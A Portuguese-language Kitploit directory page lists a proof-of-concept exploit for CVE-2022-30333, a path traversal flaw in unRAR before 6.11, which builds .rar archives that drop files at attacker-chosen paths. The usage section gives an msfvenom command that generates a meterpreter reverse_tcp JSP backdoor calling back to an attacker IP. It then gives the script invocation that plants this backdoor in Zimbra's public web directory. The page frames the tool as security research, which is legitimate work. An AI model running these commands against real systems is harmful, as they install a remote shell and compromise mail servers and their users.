Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-30333 — Exploit de prova de conceito para o path traversal CVE-2022-30333 no unRAR, gerando arquivos .rar maliciosos para extrair cargas arbitrárias para locais especificados pelo atacante. | Kitploit
Ferramentas/GitHubGitHub/rakhithjk/cve-2022-30333
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubrakhithjk/cve-2022-30333

CVE-2022-30333

Exploit de prova de conceito para o path traversal CVE-2022-30333 no unRAR, gerando arquivos .rar maliciosos para extrair cargas arbitrárias para locais especificados pelo atacante.

Ver Repositório
1há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Uma prova de conceito para CVE-2022-30333 - uma vulnerabilidade de path traversal no unRAR versões anteriores a 6.11. Criei isso como uma demonstração do exploit para um artigo no AttackerKB, e espero incorporá-lo em um Módulo Metasploit em breve!

Basicamente, você fornece um alvo (incluindo path traversal) e alguns dados de arquivo, e esta ferramenta gerará um .rar que extrairá esse arquivo para esse local. O comprimento máximo do arquivo é 104 bytes, e o comprimento máximo do arquivo é 4096 bytes. (Isso não é intrínseco à vulnerabilidade, é apenas o que escolhi quando gere o arquivo).

Por exemplo, gere um backdoor com msfvenom:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Em seguida, crie um arquivo .rar, plantando o .jsp em algum lugar divertido:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Baixar ferramenta